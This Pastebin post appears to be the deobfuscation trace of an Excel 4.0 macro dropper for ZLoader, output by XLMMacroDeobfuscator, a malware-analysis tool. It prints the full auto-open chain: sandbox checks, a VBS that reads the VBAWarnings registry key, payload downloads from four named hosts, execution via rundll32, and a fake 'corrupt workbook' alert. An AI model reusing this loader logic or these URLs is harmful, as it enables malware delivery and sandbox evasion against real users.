API tools faq
paste
Advertisement
dissectmalware

ZLOADER - new

dissectmalware
Jun 21st, 2020
1,116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.97 KB | None | 0 0
raw download clone embed print report
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d.xls
  22.  
  23. Unencrypted xls file
  24.  
  25. [Loading Cells]
  26. auto_open: auto_open->'jdOsRgCP7ufKCKrN6H'!$DA$19234
  27. [Starting Deobfuscation]
  28. CELL:DA19234 , FullEvaluation , FORMULA("=CHAR(R[-3897]C[150])",jdOsRgCP7ufKCKrN6H$CP$21706:$CP$21786)
  29. CELL:DA19235 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  30. CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
  31. CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
  32. CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
  33. CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
  34. CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
  35. CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
  36. CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
  37. CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
  38. CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
  39. CELL:II24430 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R49803C239))"
  40. CELL:II24431 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))"
  41. CELL:II24432 , FullEvaluation , "=""C:\Users\Public\yY7LXk5.vbs"""
  42. CELL:II24433 , FullEvaluation , "=""C:\Users\Public\JFxI6.txt"""
  43. CELL:II24434 , FullEvaluation , "=FOPEN(R49814C239,3)"
  44. CELL:II24435 , FullEvaluation , "=FWRITELN(R49816C239,""On Error Resume Next"")"
  45. CELL:II24436 , FullEvaluation , "=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")"
  46. CELL:II24437 , FullEvaluation , "=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")"
  47. CELL:II24438 , FullEvaluation , "=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")"
  48. CELL:II24439 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  49. CELL:II24440 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.Close"")"
  50. CELL:II24441 , FullEvaluation , "=FCLOSE(R49816C239)"
  51. CELL:II24442 , FullEvaluation , "=EXEC(""explorer.exe ""&R49814C239&"""")"
  52. CELL:II24443 , FullEvaluation , "=WHILE(ISERROR(FILES(R49815C239)))"
  53. CELL:II24444 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  54. CELL:II24445 , FullEvaluation , "=NEXT()"
  55. CELL:II24446 , FullEvaluation , "=FILE.DELETE(R49814C239)"
  56. CELL:II24447 , FullEvaluation , "=FOPEN(R49815C239,2)"
  57. CELL:II24448 , FullEvaluation , "=FREAD(R49829C239,100)"
  58. CELL:II24449 , FullEvaluation , "=FCLOSE(R49829C239)"
  59. CELL:II24450 , FullEvaluation , "=FILE.DELETE(R49815C239)"
  60. CELL:II24451 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)"
  61. CELL:II24452 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))"
  62. CELL:II24453 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  63. CELL:AM56374 , FullEvaluation , FORMULA("=FORMULA(R[-31954]C[204],R[-6572]C[200])",jdOsRgCP7ufKCKrN6H$AM$56375:$AM$56406)
  64. CELL:AM56375 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-6572]C[200])
  65. CELL:AM56376 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-6572]C[200])
  66. CELL:AM56377 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R49803C239),)",R[-6572]C[200])
  67. CELL:AM56378 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R49803C239))",R[-6572]C[200])
  68. CELL:AM56379 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)",R[-6572]C[200])
  69. CELL:AM56380 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R49803C239),)",R[-6572]C[200])
  70. CELL:AM56381 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)",R[-6572]C[200])
  71. CELL:AM56382 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)",R[-6572]C[200])
  72. CELL:AM56383 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R49803C239))",R[-6572]C[200])
  73. CELL:AM56384 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R49803C239))",R[-6572]C[200])
  74. CELL:AM56385 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))",R[-6572]C[200])
  75. CELL:AM56386 , FullEvaluation , FORMULA("=""C:\Users\Public\yY7LXk5.vbs""",R[-6572]C[200])
  76. CELL:AM56387 , FullEvaluation , FORMULA("=""C:\Users\Public\JFxI6.txt""",R[-6572]C[200])
  77. CELL:AM56388 , FullEvaluation , FORMULA("=FOPEN(R49814C239,3)",R[-6572]C[200])
  78. CELL:AM56389 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""On Error Resume Next"")",R[-6572]C[200])
  79. CELL:AM56390 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")",R[-6572]C[200])
  80. CELL:AM56391 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-6572]C[200])
  81. CELL:AM56392 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")",R[-6572]C[200])
  82. CELL:AM56393 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-6572]C[200])
  83. CELL:AM56394 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.Close"")",R[-6572]C[200])
  84. CELL:AM56395 , FullEvaluation , FORMULA("=FCLOSE(R49816C239)",R[-6572]C[200])
  85. CELL:AM56396 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R49814C239&"""")",R[-6572]C[200])
  86. CELL:AM56397 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R49815C239)))",R[-6572]C[200])
  87. CELL:AM56398 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-6572]C[200])
  88. CELL:AM56399 , FullEvaluation , FORMULA("=NEXT()",R[-6572]C[200])
  89. CELL:AM56400 , FullEvaluation , FORMULA("=FILE.DELETE(R49814C239)",R[-6572]C[200])
  90. CELL:AM56401 , FullEvaluation , FORMULA("=FOPEN(R49815C239,2)",R[-6572]C[200])
  91. CELL:AM56402 , FullEvaluation , FORMULA("=FREAD(R49829C239,100)",R[-6572]C[200])
  92. CELL:AM56403 , FullEvaluation , FORMULA("=FCLOSE(R49829C239)",R[-6572]C[200])
  93. CELL:AM56404 , FullEvaluation , FORMULA("=FILE.DELETE(R49815C239)",R[-6572]C[200])
  94. CELL:AM56405 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)",R[-6572]C[200])
  95. CELL:AM56406 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))",R[-6572]C[200])
  96. CELL:AM56407 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  97. CELL:IE49804 , PartialEvaluation , APP.MAXIMIZE()
  98. CELL:IE49805 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R49803C239),)
  99. CELL:IE49806 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R49803C239))
  100. CELL:IE49807 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R49803C239),)
  101. CELL:IE49808 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R49803C239),)
  102. CELL:IE49809 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)
  103. CELL:IE49810 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)
  104. CELL:IE49811 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R49803C239))
  105. CELL:IE49812 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R49803C239))
  106. CELL:IE49813 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R49803C239))
  107. CELL:IE49813 , FullEvaluation , [TRUE]
  108. CELL:IE49814 , FullEvaluation , "C:\Users\Public\yY7LXk5.vbs"
  109. CELL:IE49815 , FullEvaluation , "C:\Users\Public\JFxI6.txt"
  110. CELL:IE49816 , PartialEvaluation , FOPEN("C:\Users\Public\yY7LXk5.vbs",3)
  111. CELL:IE49817 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","On Error Resume Next")
  112. CELL:IE49818 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set s61VxxB = CreateObject(""WScript.Shell"")")
  113. CELL:IE49819 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set senZg = CreateObject(""Scripting.FileSystemObject"")")
  114. CELL:IE49820 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set rwi9e83n = senZg.CreateTextFile(""C:\Users\Public\JFxI6.txt"", True)")
  115. CELL:IE49821 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.WriteLine(s61VxxB.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  116. CELL:IE49822 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.Close")
  117. CELL:IE49823 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)")
  118. CELL:IE49824 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yY7LXk5.vbs")
  119. CELL:IE49825 , PartialEvaluation , WHILE(ISERROR(FILES(R49815C239)))
  120. CELL:IE49828 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yY7LXk5.vbs")
  121. CELL:IE49829 , PartialEvaluation , FOPEN("C:\Users\Public\JFxI6.txt",2)
  122. CELL:IE49830 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\JFxI6.txt"",2)",100)
  123. CELL:IE49831 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\JFxI6.txt"",2)")
  124. CELL:IE49832 , PartialEvaluation , FILE.DELETE("C:\Users\Public\JFxI6.txt")
  125. CELL:IE49833 , FullBranching , IF(ISNUMBER(SEARCH("1",R49830C239)),GOTO(R49803C239),)
  126. CELL:IE49833 , FullEvaluation , [TRUE] GOTO(R49803C239)
  127. CELL:IE49803 , End , CLOSE(FALSE)
  128. CELL:IE49833 , FullEvaluation , [FALSE]
  129. CELL:IE49834 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))
  130. CELL:IE49834 , FullEvaluation , [TRUE] GOTO(R20478C66)
  131. CELL:BN20478 , FullEvaluation , "=""C:\Users\Public\rVuj5bF.html"""
  132. CELL:BN20479 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
  133. CELL:BN20480 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)"
  134. CELL:BN20481 , FullEvaluation , "=FILES(R38077C223)"
  135. CELL:BN20482 , FullEvaluation , "=IF(ISERROR(R38080C223),GOTO(R38087C223),)"
  136. CELL:BN20483 , FullEvaluation , "=FOPEN(R38077C223)"
  137. CELL:BN20484 , FullEvaluation , "=FSIZE(R38082C223)"
  138. CELL:BN20485 , FullEvaluation , "=FCLOSE(R38082C223)"
  139. CELL:BN20486 , FullEvaluation , "=IF(R38083C223<40000,,GOTO(R38104C223))"
  140. CELL:BN20487 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
  141. CELL:BN20488 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)"
  142. CELL:BN20489 , FullEvaluation , "=FILES(R38077C223)"
  143. CELL:BN20490 , FullEvaluation , "=IF(ISERROR(R38088C223),GOTO(R38095C223),)"
  144. CELL:BN20491 , FullEvaluation , "=FOPEN(R38077C223)"
  145. CELL:BN20492 , FullEvaluation , "=FSIZE(R38090C223)"
  146. CELL:BN20493 , FullEvaluation , "=FCLOSE(R38090C223)"
  147. CELL:BN20494 , FullEvaluation , "=IF(R38091C223<40000,,GOTO(R38104C223))"
  148. CELL:BN20495 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
  149. CELL:BN20496 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)"
  150. CELL:BN20497 , FullEvaluation , "=FILES(R38077C223)"
  151. CELL:BN20498 , FullEvaluation , "=IF(ISERROR(R38096C223),GOTO(R38103C223),)"
  152. CELL:BN20499 , FullEvaluation , "=FOPEN(R38077C223)"
  153. CELL:BN20500 , FullEvaluation , "=FSIZE(R38098C223)"
  154. CELL:BN20501 , FullEvaluation , "=FCLOSE(R38098C223)"
  155. CELL:BN20502 , FullEvaluation , "=IF(R38099C223<40000,,GOTO(R38104C223))"
  156. CELL:BN20503 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
  157. CELL:BN20504 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)"
  158. CELL:BN20505 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  159. CELL:BN20506 , FullEvaluation , "=ALERT(R38104C223)"
  160. CELL:BN20507 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  161. CELL:BN20508 , FullEvaluation , "=R38077C223&"",DllRegisterServer"""
  162. CELL:BN20509 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)"
  163. CELL:BN20510 , FullEvaluation , "=GOTO(R49803C239)"
  164. CELL:BN20511 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  165. CELL:FR55133 , FullEvaluation , FORMULA("=FORMULA(R[-34656]C[-108],R[-17057]C[49])",jdOsRgCP7ufKCKrN6H$FR$55134:$FR$55166)
  166. CELL:FR55134 , FullEvaluation , FORMULA("=""C:\Users\Public\rVuj5bF.html""",R[-17057]C[49])
  167. CELL:FR55135 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[-17057]C[49])
  168. CELL:FR55136 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)",R[-17057]C[49])
  169. CELL:FR55137 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  170. CELL:FR55138 , FullEvaluation , FORMULA("=IF(ISERROR(R38080C223),GOTO(R38087C223),)",R[-17057]C[49])
  171. CELL:FR55139 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  172. CELL:FR55140 , FullEvaluation , FORMULA("=FSIZE(R38082C223)",R[-17057]C[49])
  173. CELL:FR55141 , FullEvaluation , FORMULA("=FCLOSE(R38082C223)",R[-17057]C[49])
  174. CELL:FR55142 , FullEvaluation , FORMULA("=IF(R38083C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  175. CELL:FR55143 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[-17057]C[49])
  176. CELL:FR55144 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)",R[-17057]C[49])
  177. CELL:FR55145 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  178. CELL:FR55146 , FullEvaluation , FORMULA("=IF(ISERROR(R38088C223),GOTO(R38095C223),)",R[-17057]C[49])
  179. CELL:FR55147 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  180. CELL:FR55148 , FullEvaluation , FORMULA("=FSIZE(R38090C223)",R[-17057]C[49])
  181. CELL:FR55149 , FullEvaluation , FORMULA("=FCLOSE(R38090C223)",R[-17057]C[49])
  182. CELL:FR55150 , FullEvaluation , FORMULA("=IF(R38091C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  183. CELL:FR55151 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[-17057]C[49])
  184. CELL:FR55152 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)",R[-17057]C[49])
  185. CELL:FR55153 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
  186. CELL:FR55154 , FullEvaluation , FORMULA("=IF(ISERROR(R38096C223),GOTO(R38103C223),)",R[-17057]C[49])
  187. CELL:FR55155 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
  188. CELL:FR55156 , FullEvaluation , FORMULA("=FSIZE(R38098C223)",R[-17057]C[49])
  189. CELL:FR55157 , FullEvaluation , FORMULA("=FCLOSE(R38098C223)",R[-17057]C[49])
  190. CELL:FR55158 , FullEvaluation , FORMULA("=IF(R38099C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
  191. CELL:FR55159 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[-17057]C[49])
  192. CELL:FR55160 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)",R[-17057]C[49])
  193. CELL:FR55161 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[-17057]C[49])
  194. CELL:FR55162 , FullEvaluation , FORMULA("=ALERT(R38104C223)",R[-17057]C[49])
  195. CELL:FR55163 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[-17057]C[49])
  196. CELL:FR55164 , FullEvaluation , FORMULA("=R38077C223&"",DllRegisterServer""",R[-17057]C[49])
  197. CELL:FR55165 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)",R[-17057]C[49])
  198. CELL:FR55166 , FullEvaluation , FORMULA("=GOTO(R49803C239)",R[-17057]C[49])
  199. CELL:FR55167 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
  200. CELL:HO38077 , FullEvaluation , "C:\Users\Public\rVuj5bF.html"
  201. CELL:HO38078 , FullEvaluation , "https://wireborg.com/wp-keys.php"
  202. CELL:HO38079 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  203. CELL:HO38080 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  204. CELL:HO38081 , FullBranching , IF(ISERROR(R38080C223),GOTO(R38087C223),)
  205. CELL:HO38081 , FullEvaluation , [TRUE] GOTO(R38087C223)
  206. CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  207. CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  208. CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
  209. CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
  210. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  211. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  212. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  213. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  214. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  215. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  216. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  217. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  218. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  219. CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
  220. CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
  221. CELL:IE49803 , End , CLOSE(FALSE)
  222. CELL:HO38097 , FullEvaluation , [FALSE]
  223. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  224. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  225. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  226. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  227. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  228. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  229. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  230. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  231. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  232. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  233. CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
  234. CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
  235. CELL:IE49803 , End , CLOSE(FALSE)
  236. CELL:HO38089 , FullEvaluation , [FALSE]
  237. CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  238. CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  239. CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  240. CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
  241. CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  242. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  243. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  244. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  245. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  246. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  247. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  248. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  249. CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  250. CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
  251. CELL:HO38097 , FullEvaluation , [FALSE]
  252. CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  253. CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  254. CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  255. CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
  256. CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  257. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  258. CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  259. CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  260. CELL:HO38081 , FullEvaluation , [FALSE]
  261. CELL:HO38082 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
  262. CELL:HO38083 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  263. CELL:HO38084 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
  264. CELL:HO38085 , FullEvaluation , IF(R38083C223<40000,,GOTO(R38104C223))
  265. CELL:HO38086 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
  266. CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  267. CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  268. CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
  269. CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
  270. CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  271. CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
  272. CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
  273. CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
  274. CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
  275. CELL:HO38097 , FullEvaluation , [FALSE]
